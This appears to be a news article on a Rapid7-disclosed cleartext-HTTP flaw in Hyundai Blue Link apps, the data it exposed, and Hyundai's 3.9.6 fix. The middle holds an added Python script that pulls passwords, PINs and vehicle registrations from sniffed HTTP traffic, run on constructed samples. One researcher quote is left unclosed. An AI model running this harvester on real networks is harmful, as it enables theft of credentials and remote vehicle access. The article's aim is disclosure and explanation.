The Hyundai Blue Link apps for Android and iOS, versions 3.9.4 and 3.9.5, contain a vulnerability that lets an attacker steal personal and sensitive user data. Exploiting it requires a network position between the app and Hyundai's servers: either passively listening on an insecure WiFi hotspot, or a standard man-in-the-middle (MitM) attack that tricks the user into joining a WiFi network the attacker controls.
The vulnerability was discovered by Will Hatzer and Arjun Kumar of Rapid7 who wrote in a blog post that “The potential data exposure can be exploited one user at a time via passive listening on insecure WiFi, or by the standard man-in-the-middle (MitM) attack methods to trick a user into connecting to a WiFi network controlled by an attacker on the same network as the user. If this is achieved, an attacker would then watch for HTTP traffic directed at http://18.104.22.168:8080/
The data exposed this way includes the vehicle's registration, the user's PIN (sent by the app's log transmission feature), and the app username and password. Because Blue Link lets users remotely start the vehicle, lock and unlock the doors, flash the lights and sound the horn, view saved POI history and locate the car, these credentials could be used to locate, unlock and start the Hyundai remotely. The researchers noted, however, that “It would be difficult to conduct this attack at scale since an attacker would typically need first to subvert physically local networks, or gain a privileged position on the network path from the app user to the vendor’s service instance.”
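The attack the researchers describe is passive: whoever can see the WiFi traffic can read any request the app sends in cleartext HTTP, and the credentials sit in it in the clear. The script below is an added example, not code from the Rapid7 report or from Hyundai. It parses raw HTTP/1.x request payloads (as a sniffer on an open hotspot would capture them) addressed to a fixed host:port and pulls out credential-like fields. The host 203.0.113.10:8080, the paths /login and /log, and the field names are assumptions chosen for illustration, not Hyundai's real endpoints.

```python
"""Passive credential harvesting from cleartext HTTP on a shared network.

Added example, not Hyundai's or Rapid7's code. All sample traffic below is
constructed; the endpoint, paths and field names are assumptions.
"""
import json
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Field names that typically carry secrets in a mobile app's API calls
# (assumption: a vulnerable app posts them under names like these).
SENSITIVE_FIELDS = {"username", "password", "pin", "registration", "vin"}


def parse_http_request(payload: bytes) -> Optional[dict]:
    """Split one raw HTTP/1.x request into method, target, headers and body.

    Returns None if the bytes are not a well-formed request (for example a
    TLS record, which is all a sniffer would see from a properly built app).
    """
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, target, _version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Honour Content-Length so bytes of a following request are not mixed in.
    length = int(headers.get("content-length", len(body)))
    return {"method": method, "target": target,
            "headers": headers, "body": body[:length]}


def extract_secrets(req: dict) -> Dict[str, str]:
    """Collect sensitive key/value pairs from the query string and the body."""
    found: Dict[str, str] = {}
    for key, values in parse_qs(urlsplit(req["target"]).query).items():
        if key.lower() in SENSITIVE_FIELDS:
            found[key.lower()] = values[0]
    ctype = req["headers"].get("content-type", "")
    body = req["body"]
    if body and ctype.startswith("application/json"):
        try:
            data = json.loads(body)
        except ValueError:
            data = {}
        if isinstance(data, dict):
            for key, value in data.items():
                if key.lower() in SENSITIVE_FIELDS:
                    found[key.lower()] = str(value)
    elif body and ctype.startswith("application/x-www-form-urlencoded"):
        for key, values in parse_qs(body.decode("latin-1")).items():
            if key.lower() in SENSITIVE_FIELDS:
                found[key.lower()] = values[0]
    return found


def harvest(payloads: List[bytes], host_port: str) -> List[dict]:
    """Scan captured TCP payloads and keep secrets from requests to host_port."""
    results = []
    for payload in payloads:
        req = parse_http_request(payload)
        if req is None or req["headers"].get("host") != host_port:
            continue
        secrets = extract_secrets(req)
        if secrets:
            results.append({"target": req["target"], **secrets})
    return results


# Constructed sample capture: a hypothetical login call and a log upload that
# a vulnerable app might send in cleartext to a fixed host:port, plus one
# unrelated request that the filter should ignore.
SAMPLE_PAYLOADS = [
    (b"POST /login HTTP/1.1\r\nHost: 203.0.113.10:8080\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 37\r\n\r\n"
     b"username=alice&password=hunter2&app=1"),
    (b"POST /log HTTP/1.1\r\nHost: 203.0.113.10:8080\r\n"
     b"Content-Type: application/json\r\nContent-Length: 41\r\n\r\n"
     b'{"pin": "1234", "registration": "ABC123"}'),
    b"GET /weather?city=LA HTTP/1.1\r\nHost: other.example:80\r\n\r\n",
]

if __name__ == "__main__":
    for hit in harvest(SAMPLE_PAYLOADS, "203.0.113.10:8080"):
        print(hit)
```

Run against the same capture with the app speaking TLS, `parse_http_request` returns None for every payload and nothing is harvested; that is the whole difference the 3.9.6 fix makes. On the defender side the same logic, inverted, is a useful app-review check: flag any mobile app that talks to a hard-coded IP:port over plain HTTP, especially when the request carries a PIN or password.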
Hyundai Motor America (HMA) was informed of the issue and acknowledged that a vulnerability affected its users. The good news is that Hyundai fixed it quickly, releasing version 3.9.6 on both Google Play and the Apple App Store; users should check that their installed Blue Link app is 3.9.6 or later.
Update your Hyundai Blue Link app
According to an official statement from Hyundai, “The privacy and security of our customers are of the utmost importance to HMA. HMA continuously seeks to improve its mobile application and system security. As a member of the Automotive Information Sharing Analysis Center (Auto-ISAC), HMA values security information sharing and thanks Rapid7 for its report.”
The Hyundai Blue Link application was launched in December 2016 to give users instant access to their vehicle. Given the poor security track record of Internet of Things (IoT) devices and the apps that control them, it should not surprise users that Hyundai's apps were vulnerable too.
Security researchers have previously found similar vulnerabilities in other vehicle-related apps. For instance, one researcher hacked the General Motors (GM) mobile app and demonstrated how an attacker could locate, unlock and steal the targeted car. More recently, just a couple of weeks ago, researchers exposed critical vulnerabilities in a WiFi dongle that let them reach a car's data transmitter over Bluetooth.